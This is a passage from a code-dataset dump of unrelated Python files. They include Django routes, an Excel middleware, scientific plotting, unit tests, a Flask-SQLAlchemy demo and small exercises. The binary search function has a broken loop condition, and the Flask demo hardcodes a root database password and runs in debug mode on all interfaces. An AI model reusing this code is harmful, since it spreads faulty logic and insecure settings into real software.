waterpurifier.delivery.views import (AddOrderView, CustomerCreateView, CustomerDeleteView, CustomerListView,\n CustomerUpdateView, DeviceCreateView, DeviceDeleteView, DeviceListView,\n DeviceUpdateView, OrderDeleteView, OrderListView, OrderUpdateView, Home)\n\n\napp_name = \"delivery\"\nurlpatterns = [\n path(\"\", Home.as_view(), name=\"home\"),\n path(\"customers/\", CustomerListView.as_view(), name=\"customer-list\"),\n path(\"customers/create/\", CustomerCreateView.as_view(), name=\"customer-create\"),\n path(\"customers//\", CustomerUpdateView.as_view(), name=\"customer-update\"),\n path(\n \"customers//delete/\",\n CustomerDeleteView.as_view(),\n name=\"customer-delete\",\n ),\n path(\n \"customers//addorder/\", AddOrderView.as_view(), name=\"customer-addorder\"\n ),\n path(\"devices/\", DeviceListView.as_view(), name=\"device-list\"),\n path(\"devices/create/\", DeviceCreateView.as_view(), name=\"device-create\"),\n path(\"devices//\", DeviceUpdateView.as_view(), name=\"device-update\"),\n path(\"devices//delete/\", DeviceDeleteView.as_view(), name=\"device-delete\"),\n path(\"orders/\", OrderListView.as_view(), name=\"order-list\"),\n path(\"orders//\", OrderUpdateView.as_view(), name=\"order-update\"),\n path(\"orders//delete/\", OrderDeleteView.as_view(), name=\"order-delete\"),\n]\n","sub_path":"waterpurifier/delivery/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"538450159","text":"\"\"\"\n django_excel\n ~~~~~~~~~~~~~~~~~~~\n\n A django middleware that provides one application programming interface\n to read and write data in different excel file formats\n\n :copyright: (c) 2015 by Onni Software Ltd.\n :license: New BSD License\n\"\"\"\nfrom django.core.files.uploadhandler import (\n MemoryFileUploadHandler, TemporaryFileUploadHandler)\nfrom django.core.files.uploadedfile import (\n InMemoryUploadedFile, TemporaryUploadedFile)\nfrom django.http import HttpResponse\nimport pyexcel as pe\nimport pyexcel_webio as webio\n\n\nclass ExcelMixin(webio.ExcelInput):\n def _get_file_extension(self):\n extension = self.name.split(\".\")[1]\n return extension\n\n def load_single_sheet(self, sheet_name=None, **keywords):\n return pe.get_sheet(\n file_type=self._get_file_extension(),\n file_content=self.file.read(),\n sheet_name=sheet_name,\n **keywords)\n\n def load_book(self, **keywords):\n return pe.get_book(\n file_type=self._get_file_extension(),\n file_content=self.file.read(),\n **keywords)\n\n def save_to_database(self, model=None,\n sheet_name=None,\n name_columns_by_row=0,\n name_rows_by_column=-1,\n **keywords):\n sheet = self.load_single_sheet(\n sheet_name=sheet_name,\n name_columns_by_row=name_columns_by_row,\n name_rows_by_column=name_rows_by_column,\n **keywords)\n if sheet:\n sheet.save_to_django_model(model, **keywords)\n\n def save_book_to_database(self, models=None, **keywords):\n book = self.load_book(**keywords)\n if book:\n book.save_to_django_models(models, **keywords)\n\n\nclass ExcelInMemoryUploadedFile(ExcelMixin, InMemoryUploadedFile):\n pass\n\n\nclass TemporaryUploadedExcelFile(ExcelMixin, TemporaryUploadedFile):\n pass\n\n\nclass ExcelMemoryFileUploadHandler(MemoryFileUploadHandler):\n def file_complete(self, file_size):\n if not self.activated:\n return\n self.file.seek(0)\n return ExcelInMemoryUploadedFile(\n file=self.file,\n field_name=self.field_name,\n name=self.file_name,\n content_type=self.content_type,\n size=file_size,\n charset=self.charset,\n content_type_extra=self.content_type_extra\n )\n\n\nclass TemporaryExcelFileUploadHandler(TemporaryFileUploadHandler):\n def new_file(self, file_name, *args, **kwargs):\n \"\"\"\n Create the file object to append to as data is coming in.\n \"\"\"\n super(TemporaryFileUploadHandler, self).new_file(\n file_name,\n *args,\n **kwargs)\n self.file = TemporaryUploadedExcelFile(\n self.file_name,\n self.content_type,\n 0,\n self.charset,\n self.content_type_extra)\n\n\nwebio.ExcelResponse = HttpResponse\n\n\nfrom pyexcel_webio import (\n make_response,\n make_response_from_array,\n make_response_from_dict,\n make_response_from_records,\n make_response_from_book_dict,\n make_response_from_query_sets\n)\n\n\ndef make_response_from_a_table(model, file_type, status=200, **keywords):\n \"\"\"\n Produce a single sheet Excel book of *file_type*\n\n :param model: a Django model\n :param file_type: same as :meth:`~django_excel.make_response`\n :param status: same as :meth:`~django_excel.make_response`\n \"\"\"\n sheet = pe.get_sheet(model=model, **keywords)\n return make_response(sheet, file_type, status, **keywords)\n\n\ndef make_response_from_tables(models, file_type, status=200, **keywords):\n \"\"\"\n Produce a multiple sheet Excel book of *file_type*. It becomes the same\n as :meth:`~django_excel.make_response_from_a_table` if you pass *tables*\n with an array that has a single table\n\n :param models: a list of Django models\n :param file_type: same as :meth:`~django_excel.make_response`\n :param status: same as :meth:`~django_excel.make_response`\n \"\"\"\n book = pe.get_book(models=models, **keywords)\n return make_response(book, file_type, status, **keywords)\n","sub_path":"django_excel/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"285297056","text":"\"\"\"\n### Print all the keys and values for a dictionary\n\nGiven a dictionary print all its keys and values separated by a dash \"-\".\nExample:\n\n my_dict = {\n 'company': 'Apple Inc',\n 'stock': 'AAPL'\n }\n print_keys_vals_dictionary(my_dict)\n # Should print:\n # company - \"Apple Inc\"\n # stock - \"AAPL\"\n\"\"\"\n\nmy_dict = {\n 'company': 'Apple Inc',\n 'stock': 'AAPL',\n 'prices_today': [126.41, 126.40, 126.43, 126.59, 126.190, 126.41],\n 'key_people': {\n 'CEO': 'Tim Cook',\n 'CTO': 'Will and Chad',\n }\n}\n\n\n# company - Apple Inc\nprint('company' + ' - ' + my_dict['company'])\nprint('stock' + ' - ' + my_dict['stock'])\nprint(\"Prices for today: \" + str(my_dict['prices_today']))","sub_path":"class-12/santi/santi.py","file_name":"santi.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"461332829","text":"N = list(map(int, input().split()))\nif len(N) == 3:\n print(*N)\nelse:\n max1 = N[0]\n min1 = N[0]\n for n in N:\n if n > max1:\n max1 = n\n if n < min1:\n min1 = n\n N.remove(max1)\n N.remove(min1)\n max2 = N[0]\n min2 = N[0]\n for n in N:\n if n > max2:\n max2 = n\n if n < min2:\n min2 = n\n N.remove(max2)\n max3 = N[0]\n for n in N:\n if n > max3:\n max3 = n\n p1 = min1 * min2 * max1\n p2 = max1 * max2 * max3\n if p1 > p2:\n print(min1, min2, max1)\n else:\n print(max1, max2, max3)\n","sub_path":"Week5/w5.py","file_name":"w5.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"538266954","text":"\"\"\"\n.. module:: test_general.py\n\n :copyright: @2013 Earth System Documentation (http://es-doc.org)\n :license: GPL / CeCILL\n :platform: Unix, Windows\n :synopsis: Executes pyesdoc general tests.\n\n.. moduleauthor:: Earth System Documentation (ES-DOC) \n\n\"\"\"\n# Module imports.\nimport inspect\n\nimport nose.tools\n\nimport pyesdoc\nimport test_utils as tu\nimport test_types as tt\n\n\n\n# Test ontology constants.\n_CIM = 'cim'\n_CIM_V1 = '1'\n_CIM_PACKAGE = 'software'\n_CIM_TYPE = 'modelComponent'\n\n# Test constants.\n_INSTITUTE = 'TEST'\n_PROJECT = 'TEST'\n\n\ndef _create_doc(ontology=_CIM,\n version=_CIM_V1,\n package=_CIM_PACKAGE,\n typeof=_CIM_TYPE):\n \"\"\"Creates a test document.\"\"\"\n type_key = \".\".join([ontology, version, package, typeof])\n\n return pyesdoc.create(type_key, _INSTITUTE, _PROJECT)\n\n\ndef _assert_doc(doc, typeof=None):\n \"\"\"Perform standard test document assertions.\"\"\"\n tu.assert_object(doc, typeof)\n if hasattr(doc, 'meta'):\n tu.assert_str(doc.meta.institute, _INSTITUTE.lower())\n tu.assert_str(doc.meta.language, pyesdoc.ESDOC_DEFAULT_LANGUAGE)\n tu.assert_str(doc.meta.project, _PROJECT.lower())\n\n\ndef _test_module_setup(mod):\n \"\"\"Test that the test document module is correctly setup.\"\"\"\n tu.assert_bool(mod in tt.MODULES, True)\n tu.assert_bool(mod in tt.INITIAL_STATE, True)\n for field in tt.STATE_FIELDS:\n tu.assert_bool(hasattr(mod, field), True)\n\n\ndef _test_version():\n \"\"\"Test package version.\"\"\"\n tu.assert_str(pyesdoc.__version__, \"0.9.0.3\")\n\n\ndef _test_module_reset(mod):\n \"\"\"Test that the test document modules are correctly reset.\"\"\"\n # Assert module state is cached.\n assert mod in tt.INITIAL_STATE\n\n # Update state.\n for field in tt.STATE_FIELDS:\n setattr(mod, field, \"XXX\")\n tu.assert_str(getattr(mod, field), \"XXX\")\n\n # Reset.\n tt.reset(mod)\n\n # Assert initial state.\n for field in tt.STATE_FIELDS:\n state = tt.INITIAL_STATE[mod][field]\n assert getattr(mod, field) == state\n\n\ndef _test_module_file_open(mod):\n \"\"\"Test opening module test files.\"\"\"\n assert tu.get_test_file(mod.DOC_FILE) is not None\n\n\ndef _test_create_01():\n \"\"\"Test creating documents - 1.\"\"\"\n doc = _create_doc()\n _assert_doc(doc, pyesdoc.ontologies.cim.v1.ModelComponent)\n\n\ndef _test_create_02():\n \"\"\"Test creating documents - 2.\"\"\"\n for ontology, version, package, typeof in pyesdoc.list_types():\n doc = _create_doc(ontology, version, package, typeof)\n _assert_doc(doc)\n type_key = \"{0}.{1}.{2}.{3}\".format(ontology, version, package, typeof)\n tu.assert_str(doc.__class__.type_key, type_key)\n\n\ndef _test_create_03():\n \"\"\"Test creating documents - 3.\"\"\"\n for doc_type in pyesdoc.get_types():\n doc = pyesdoc.create(doc_type, _INSTITUTE, _PROJECT)\n _assert_doc(doc, doc_type)\n\n\ndef _test_import(mod):\n \"\"\"Test module import.\"\"\"\n assert inspect.ismodule(mod)\n\n\ndef test_imports_01():\n \"\"\"Test importing packages - 1.\"\"\"\n for mod in (\n pyesdoc,\n pyesdoc.constants,\n pyesdoc.factory,\n pyesdoc.io,\n pyesdoc.ontologies,\n pyesdoc.options,\n pyesdoc.parsing,\n pyesdoc.parsing.default,\n pyesdoc.parsing.parser,\n pyesdoc.publishing,\n pyesdoc.serialization,\n pyesdoc.utils,\n pyesdoc.utils.convert,\n pyesdoc.utils.functional,\n pyesdoc.utils.runtime,\n pyesdoc.validation,\n pyesdoc.validation.graph,\n pyesdoc.validation.validator,\n ):\n tu.init(_test_import, \"import module\", mod)\n yield _test_import, mod\n\n\ndef test_imports_02():\n \"\"\"Test importing packages - 2.\"\"\"\n cim = pyesdoc.ontologies.cim\n for mod in (\n cim,\n cim.v1,\n cim.v1.decoder,\n cim.v1.decoder_for_activity_package,\n cim.v1.decoder_for_data_package,\n cim.v1.decoder_for_grids_package,\n cim.v1.decoder_for_misc_package,\n cim.v1.decoder_for_quality_package,\n cim.v1.decoder_for_shared_package,\n cim.v1.decoder_for_software_package,\n cim.v1.typeset,\n cim.v1.typeset_for_activity_package,\n cim.v1.typeset_for_data_package,\n cim.v1.typeset_for_grids_package,\n cim.v1.typeset_for_misc_package,\n cim.v1.typeset_for_quality_package,\n cim.v1.typeset_for_shared_package,\n cim.v1.typeset_for_software_package,\n cim.v1.typeset_meta,\n ):\n tu.init(_test_import, \"import cim module\", mod)\n yield _test_import, mod\n\n\ndef _test_is_supported_ontology():\n \"\"\"Test supported ontologies.\"\"\"\n # supported\n assert pyesdoc.is_supported(_CIM, _CIM_V1)\n\n # unsupported\n assert not pyesdoc.is_supported('x', _CIM_V1)\n assert not pyesdoc.is_supported(_CIM, 'x')\n\n\ndef _test_is_supported_type_01():\n \"\"\"Test supported ontology types - positive.\"\"\"\n # supported\n assert pyesdoc.is_supported(_CIM, _CIM_V1, _CIM_PACKAGE, _CIM_TYPE)\n for ontology, version, package, typeof in pyesdoc.list_types():\n assert pyesdoc.is_supported(ontology, version, package, typeof)\n\n\ndef _test_is_supported_type_02():\n \"\"\"Test supported ontology types - negative.\"\"\"\n # unsupported\n assert not pyesdoc.is_supported('x', _CIM_V1, _CIM_PACKAGE, _CIM_TYPE)\n assert not pyesdoc.is_supported(_CIM, 'x', _CIM_PACKAGE, _CIM_TYPE)\n assert not pyesdoc.is_supported(_CIM, _CIM_V1, 'x', _CIM_TYPE)\n assert not pyesdoc.is_supported(_CIM, _CIM_V1, _CIM_PACKAGE, 'x')\n\n\ndef _test_list_types():\n \"\"\"Test listing supported types.\"\"\"\n # supported - all\n types = pyesdoc.list_types()\n tu.assert_int(len(types), 103)\n\n # supported - cim v1\n types = pyesdoc.list_types(_CIM, _CIM_V1)\n tu.assert_int(len(types), 103)\n\n # unsupported\n types = pyesdoc.list_types('x', 'x')\n tu.assert_int(len(types), 0)\n\n\ndef _test_set_option_01():\n \"\"\"Test setting package options - positive.\"\"\"\n api_url = 'http://es-doc.org'\n api_url_old = pyesdoc.get_option('api_url')\n pyesdoc.set_option('api_url', api_url)\n tu.assert_str(api_url, pyesdoc.get_option('api_url'))\n pyesdoc.set_option('api_url', api_url_old)\n\n\n@nose.tools.raises(pyesdoc.PYESDOC_Exception)\ndef _test_set_option_02():\n \"\"\"Test setting package options - negative.\"\"\"\n pyesdoc.set_option('xxx', 'xxx')\n\n\ndef test():\n \"\"\"Runs set of geenral unit tests.\"\"\"\n for mod in tt.MODULES:\n tu.init(_test_module_file_open, 'open document module test file', mod)\n yield _test_module_file_open, mod\n\n for mod in tt.MODULES:\n tu.init(_test_module_reset, 'document module reset', mod)\n yield _test_module_reset, mod\n\n for mod in tt.MODULES:\n tu.init(_test_module_setup, 'document module setup', mod)\n yield _test_module_setup, mod\n\n for func in (\n _test_version,\n _test_set_option_01,\n _test_set_option_02,\n _test_is_supported_ontology,\n _test_is_supported_type_01,\n _test_is_supported_type_02,\n _test_list_types,\n _test_create_01,\n _test_create_02,\n _test_create_03,\n ):\n tu.init(func, func.__doc__[5:])\n yield func\n\n","sub_path":"tests/test_general.py","file_name":"test_general.py","file_ext":"py","file_size_in_byte":7247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"495799420","text":"#!/usr/bin/env python\nfrom __future__ import division, print_function\nimport argparse\nimport sys\n\nimport cooler\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description=\"Output a genome segmentation of restriction fragments as a BED file.\")\n parser.add_argument(\n \"chromsizes\",\n help=\"UCSC-like chromsizes file, with chromosomes in desired order\",\n metavar=\"CHROMSIZES_PATH\")\n parser.add_argument(\n \"binsize\",\n help=\"Resolution (bin size) in base pairs \",\n metavar=\"BINSIZE\")\n parser.add_argument(\n \"--out\", \"-o\",\n help=\"Output file (defaults to stdout)\")\n args = vars(parser.parse_args())\n\n binsize = int(args['binsize'])\n chromsizes = cooler.read_chromsizes(args['chromsizes'])\n bins = cooler.binnify(chromsizes, binsize)\n\n # Write output\n out = args['out']\n try:\n if out is None:\n f = sys.stdout\n else:\n f = open(out, 'wt')\n bins.to_csv(f, sep='\\t', index=False, header=False)\n except OSError:\n pass\n finally:\n f.close()\n","sub_path":"scripts/make_bins.py","file_name":"make_bins.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"278033944","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n# muisc\n\nimport requests\nimport re\nimport webbrowser\n\nurl = 'http://music.baidu.com/search?'\nword = '在人间'\n### 百度音乐网址 url\n### 关键字 word\nheaders = {'user-agent': 'my-app/0.Mozilla/5.0 (iPhone; CPU iPhone OS 10_3 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) CriOS/56.0.2924.75 Mobile/14E5239e Safari/602.10.1'}\n### 以手机端代理访问\nkey = {'key': word}\nr = requests.get(url, params=key)\ncode = requests.get(r.url, headers=headers)\nhtml = code.text\n### 把关键字传递给百度音乐移动版网页 并获取源码\nprint (r.url)\nwebbrowser.open(r.url, new=0, autoraise=True)\n### 打开网页\n","sub_path":"python/py/muisc.py","file_name":"muisc.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"354851316","text":"import csv\nimport sys\nfrom collections import defaultdict\nimport numpy as np\nimport pandas as pd\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nfrom matplotlib.backends.backend_pdf import PdfPages\nimport matplotlib.colors as colors\nimport matplotlib.cm as cm\nfrom bokeh.plotting import figure, ColumnDataSource\nfrom bokeh.charts import Bar\nfrom bokeh.layouts import column\nfrom bokeh.models import (HoverTool, BoxZoomTool, ResetTool, PanTool,\n WheelZoomTool)\nfrom bokeh.resources import CDN\nfrom bokeh.embed import file_html\n\n\nclass GeneQuantiViz(object):\n \n def __init__(self, gene_wise_quanti_combined_path, lib_names, output_path,\n use_antisene=True, axis_min=None, axis_max=None):\n self._gene_wise_quanti_combined_path = gene_wise_quanti_combined_path\n self._output_path = output_path\n self._lib_names = lib_names\n self._use_antisene = use_antisene\n self._axis_min = axis_min\n self._axis_max = axis_max\n\n def parse_input_table(self):\n self._lib_names_and_countings = defaultdict(list)\n # Dict of dict of dict:\n # lib name -> relative direction (sense/anti-sense)\n # -> annotation type (CDS, rRNA ..)\n self._lib_names_and_class_quanti = defaultdict(\n lambda: defaultdict(lambda: defaultdict(float)))\n for row in csv.reader(\n open(self._gene_wise_quanti_combined_path), delimiter=\"\\t\"):\n if row[0].startswith(\"Orientation\"):\n continue\n for index, cell in enumerate(row[10:]):\n self._lib_names_and_countings[\n self._lib_names[index]].append(float(cell))\n self._lib_names_and_class_quanti[\n self._lib_names[index]][row[0]][row[3]] += float(cell)\n self.file_handle_bokeh()\n\n def file_handle_bokeh(self):\n data_bokeh_overview = []\n gene_quanti_combined_raw = pd.read_csv(\n self._gene_wise_quanti_combined_path, sep='\\t', index_col=False)\n attr_dic = []\n for index, row in gene_quanti_combined_raw.iterrows():\n attr_dic.append(self._dictionary_attributes(row))\n df_attributes = pd.DataFrame(attr_dic)\n gene_quanti_combined_raw = pd.concat([\n gene_quanti_combined_raw, df_attributes], axis=1, join_axes=[\n gene_quanti_combined_raw.index])\n gene_quanti_combined_raw.drop(\"Attributes\", axis=1, inplace=True)\n data_bokeh_overview.append(\n self._plotting_data_bokeh_overview(gene_quanti_combined_raw))\n self._plot_bokeh_read_no_per_lib(\n gene_quanti_combined_raw, data_bokeh_overview)\n\n def _plotting_data_bokeh_overview(self, gene_quanti_combined_raw):\n gene_quanti_combined_raw = gene_quanti_combined_raw.rename(\n columns={\n 'Orientation of counted reads relative to the strand location '\n 'of the annotation': 'Orientation'})\n orientation_list = []\n for orientation, df_rest in gene_quanti_combined_raw.groupby(\n 'Orientation'):\n orientation_list.append(orientation)\n feature_list = []\n for feature, df_rest in gene_quanti_combined_raw.groupby('Feature'):\n feature_list.append(feature)\n library = []\n feature_orientation = []\n count = []\n for lib_name in self._lib_names:\n library.append(lib_name)\n for orientation in orientation_list:\n for feature in feature_list:\n df_intermediate = gene_quanti_combined_raw[\n (gene_quanti_combined_raw.Orientation == orientation) & (\n gene_quanti_combined_raw.Feature == feature)]\n feature_orientation.append('%s (%s)' % (\n feature, orientation))\n count.append(sum(df_intermediate[lib_name]))\n libraries = [\n item for item in library for i in range(len(feature_list) * len(\n orientation_list))]\n data_set = {}\n data_set['Library'] = libraries\n data_set['Features_Orientation'] = feature_orientation\n data_set['Gene count'] = count\n self.create_csv(data_set)\n self.plot_correlations()\n self.plot_annotation_class_quantification(orientation_list)\n return data_set\n\n def create_csv(self, data_set):\n with open(self._output_path + '/Read No per RNA class.csv',\n 'w') as csv_file:\n writer = csv.writer(csv_file, delimiter='\\t')\n for key, value in data_set.items():\n writer.writerow([key] + value)\n \n def plot_correlations(self):\n self._prepare_document(self._output_path + '/Correlation.pdf')\n if self._axis_min is None:\n self._axis_min = 0.1\n if self._axis_max is None:\n self._set_axis_max()\n for lib_1 in self._lib_names:\n for lib_2 in self._lib_names:\n if lib_1 == lib_2:\n continue\n self._plot_correlation(lib_1, lib_2)\n self._close_document()\n\n def _prepare_document(self, file_name):\n self._pp = PdfPages(file_name)\n\n def _close_document(self):\n self._pp.close()\n\n def _plot_correlation(self, lib_1, lib_2):\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.set_aspect(1)\n ax.set_yscale('log')\n ax.set_xscale('log')\n # Draw line\n plt.plot([self._axis_min, self._axis_max],\n [self._axis_min, self._axis_max],\n linestyle=\"solid\", color=\"green\", alpha=0.4)\n # Calculate the Pearson correlation coefficient\n corr_coeff = np.corrcoef(self._lib_names_and_countings[lib_1],\n self._lib_names_and_countings[lib_2])[0][1]\n # Set axis ranges\n plt.axis([self._axis_min, self._axis_max,\n self._axis_min, self._axis_max])\n plt.title(\"%s vs. %s\\n(r = %s)\" % (lib_1, lib_2, corr_coeff))\n plt.plot(self._lib_names_and_countings[lib_1],\n self._lib_names_and_countings[lib_2],\n \"k.\", alpha=0.2)\n plt.xlabel(\"Expression %s\" % lib_1)\n plt.ylabel(\"Expression %s\" % lib_2)\n self._pp.savefig()\n plt.close(fig)\n\n def _set_axis_max(self):\n self._axis_max = max(\n [max(counting)\n for counting in self._lib_names_and_countings.values()])\n\n def plot_annotation_class_quantification(self, orientation_list):\n all_classes_sorted = set()\n no_of_libs = len(self._lib_names)\n for directions in self._lib_names_and_class_quanti.values():\n for classes_and_counting in directions.values():\n for anno_class in classes_and_counting.keys():\n all_classes_sorted.add(anno_class)\n all_classes_sorted = sorted(list(all_classes_sorted))\n bottom = np.array([0] * no_of_libs)\n fig = plt.figure()\n ax = plt.subplot(111)\n font = {'family': 'sans-serif', 'weight': 'normal', 'size': 6}\n matplotlib.rc('font', **font)\n plt.title(\"Number of reads per RNA classes\")\n color_map = plt.get_cmap('Set3')\n cNorm = colors.Normalize(vmin=0, vmax=len(\n all_classes_sorted)*len(orientation_list)-1)\n scalarMap = cm.ScalarMappable(norm=cNorm, cmap=color_map)\n color_index = 0\n for direction in self._lib_names_and_class_quanti[\n self._lib_names[0]].keys():\n for anno_class in all_classes_sorted:\n countings = [\n self._lib_names_and_class_quanti[lib][direction][\n anno_class] for lib in self._lib_names]\n color = scalarMap.to_rgba(color_index)\n plt.bar(range(no_of_libs), countings, align=\"center\",\n bottom=bottom, linewidth=0, color=color, width=0.5,\n label=anno_class+\" \"+direction)\n bottom = bottom + countings\n color_index += 1\n plt.xticks(np.array(range(no_of_libs)), self._lib_names, rotation=45,\n ha=\"right\")\n plt.tight_layout()\n ax.spines['top'].set_visible(False)\n ax.spines['right'].set_visible(False)\n ax.spines['left'].set_visible(False)\n ax.xaxis.set_ticks_position(\"none\")\n plt.legend(loc=\"upper right\", frameon=False, ncol=4)\n fig.savefig(self._output_path + '/Read No per RNA Class.pdf')\n\n def _plot_bokeh_read_no_per_lib(\n self, gene_quanti_combined_raw, data_bokeh_overview):\n try:\n colors = ['Black', 'DarkSlateGray', 'MediumVioletRed', 'DarkCyan',\n 'Indigo', 'DarkBlue', '#a6cee3', '#1f78b4', '#b2df8a',\n '#33a02c', '#fb9a99', '#e31a1c', '#fdbf6f', '#ff7f00',\n '#cab2d6', '#6a3d9a', '#ffff99', '#b15928']\n except IndexError:\n sys.stderr.write(\"Appearently the number of features to be \"\n \"plotted exceeds '18'. Exiting\\n\")\n sys.exit(2)\n plots = []\n for data_set in data_bokeh_overview:\n pl = Bar(data_set, values='Gene count', label='Library', agg='sum',\n stack='Features_Orientation', palette=colors, tools=[\n HoverTool(tooltips=[(\"No of reads\", \"@height\")]),\n BoxZoomTool(), ResetTool(), PanTool(),\n WheelZoomTool()])\n pl.legend.background_fill_alpha = 0.5\n plots.append(pl)\n self._plot_bokeh_correlation(gene_quanti_combined_raw, plots)\n\n def _plot_bokeh_correlation(self, gene_quanti_combined_raw, plots):\n for lib_1 in self._lib_names:\n for lib_2 in self._lib_names:\n if lib_1 != lib_2:\n corr_coeff = np.corrcoef(\n gene_quanti_combined_raw[lib_1],\n gene_quanti_combined_raw[lib_2])[0][1]\n line_max = max(max(gene_quanti_combined_raw[lib_1]),\n max(gene_quanti_combined_raw[lib_2]))\n pl = figure(title='%s vs %s (r=%s)' % (\n lib_1, lib_2, corr_coeff), tools=[HoverTool(tooltips=[\n (\"Protein_ID\", \"@Name\"),\n (\"Sequence type\", \"@gbkey\"),\n (\"Product\", \"@product\")]), PanTool(),\n BoxZoomTool(),\n WheelZoomTool(),\n ResetTool()])\n pl.scatter(gene_quanti_combined_raw[lib_1],\n gene_quanti_combined_raw[lib_2], color='Black',\n source=ColumnDataSource(\n gene_quanti_combined_raw))\n pl.xaxis.axis_label = 'Expression %s' % (lib_1)\n pl.yaxis.axis_label = 'Expression %s' % (lib_2)\n pl.title.text_font_style = 'italic'\n pl.line([0.1, line_max], [0.1, line_max], line_width=0.8,\n color='Green')\n plots.append(pl)\n column(*plots)\n plot = column(*plots)\n html = file_html(plot, CDN, 'Viz Gene Quanti')\n with open(\n self._output_path + '/Visualization Gene Quantification.html',\n 'w') as output_bokeh:\n output_bokeh.write(html)\n \n def _dictionary_attributes(self, row):\n dic = dict([key.split(\"=\")\n for key in row[\"Attributes\"].split(\";\")])\n return dic\n\n","sub_path":"reademptionlib/vizgenequanti.py","file_name":"vizgenequanti.py","file_ext":"py","file_size_in_byte":11857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"270402429","text":"def iterativeBS(_list, item):\n start = 0\n end = len(_list) - 1\n found = False\n\n while end <= start and not found:\n mid = int((start + end)/2)\n if _list[mid] == item:\n found = True\n else:\n if item < _list[mid]:\n end = mid - 1 # looking the left side of the array\n else:\n start = mid + 1 # looking the right side of the array\n return found\n","sub_path":"Algorithms/searching/iterativeBinarySearch.py","file_name":"iterativeBinarySearch.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"296221819","text":"from flask import Flask\nfrom flask_sqlalchemy import SQLAlchemy\nimport pymysql\npymysql.install_as_MySQLdb()\n\napp=Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI']='mysql://root:123456@localhost:3306/flask'\napp.config['SQLALCHEMY_COMMIT_ON_TEARDOWN']=True\n\ndb=SQLAlchemy(app)\n\nclass Users(db.Model):\n __tablename__='users'\n id=db.Column(db.Integer,primary_key=True)\n username=db.Column(db.String(80),nullable=False,unique=True)\n age=db.Column(db.Integer)\n email=db.Column(db.String(120),unique=True)\n isActive=db.Column(db.Boolean,default=True)\n #添加多(Users)对多(Goods)的关联属性和反向应用关系\n #涉及到第三张关联表-users_goods\n goods=db.relationship('Goods',secondary='users_goods',lazy='dynamic',backref=db.backref('users',lazy='dynamic'))\n #增加对UsersGoods的关联属性和反向引用关系:目的是为了创建Users类与UsersGoods类之间的关系\n userGoods=db.relationship('UsersGoods',backref='user',lazy='dynamic')\n\nclass Goods(db.Model):\n __tablename__='goods'\n id=db.Column(db.Integer,primary_key=True)\n gname=db.Column(db.String(80))\n gprice=db.Column(db.Float)\n #增加对UsersGoods的关联属性和反向引用关系:目的是为了创建Goods类与UsersGoods类之间的关系\n goodUsers = db.relationship('UsersGoods', backref='good', lazy='dynamic')\n\n#创建users_goods的第三张关联表,从而来表示多对多的关系\nclass UsersGoods(db.Model):\n __tablename__='users_goods'\n id=db.Column(db.Integer,primary_key=True)\n users_id=db.Column(db.Integer,db.ForeignKey('users.id'))\n goods_id=db.Column(db.Integer,db.ForeignKey('goods.id'))\n count=db.Column(db.Integer,default=1)\n\ndb.create_all()\n\n@app.route('/01-users-goods')\ndef users_goods_views():\n # #为1号用户购买1号商品\n user=Users.query.filter_by(id=1).first()\n good=Goods.query.filter_by(id=1).first()\n #将good商品增加到user所购买的商品列表中\n user.goods.append(good)\n #将user更新回数据库\n db.session.add(user)\n\n #为1号用户购买2号商品\n ug=UsersGoods()\n ug.users_id=1\n ug.goods_id=2\n ug.count=5\n db.session.add(ug)\n return 'ok'\n\n\n@app.route('/02-remove-goods')\ndef remove_goods():\n #获取id=1的Users信息\n user=Users.query.filter_by(id=1).first()\n #获取id=1的Goods信息\n good = Goods.query.filter_by(id=1).first()\n #将good从user中移除出去\n user.goods.remove(good)\n db.session.add(user)\n return 'Remove ok'\n\n\n@app.route('/03-query-goods')\ndef query_goods():\n #查询1号用户购买的商品\n user=Users.query.filter_by(id=1).first()\n goods=user.goods.all()\n print('用户姓名:%s'%user.username)\n for g in goods:\n print('商品名称:%s'%g.gname)\n #查询每个商品的购买数量\n count=user.userGoods.filter_by(goods_id=g.id).first().count\n print('购买数量:%d'%count)\n #购买2号商品的用户\n good=Goods.query.filter_by(id=2).first()\n users=good.users.all()\n print('商品名称:%s'% good.gname)\n for u in users:\n print('用户姓名:%s'% u.username)\n coun=good.goodUsers.filter_by(users_id=u.id).first().count\n print('购买数量%d'%coun)\n return 'ok'\n\nif __name__=='__main__':\n app.run(debug=True,host='0.0.0.0')","sub_path":"PycharmProjects/FlaskDemo07/run01.py","file_name":"run01.py","file_ext":"py","file_size_in_byte":3348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"325981697","text":"from mongoengine import Document, StringField, ListField, ObjectIdField\nimport src.entities.entity as entity\n\nclass CharacterTemplate(\n entity.LogicEntity,\n entity.HasData,\n entity.HasRegion,\n entity.HasItems):\n\n def __init__(self, *args, **kwargs):\n super(Document, self).__init__(*args, **kwargs)\n\n meta: {\n 'collection': 'characterTemplate'\n }\n\nclass Character(\n entity.LogicEntity,\n entity.HasData,\n entity.HasRoom,\n 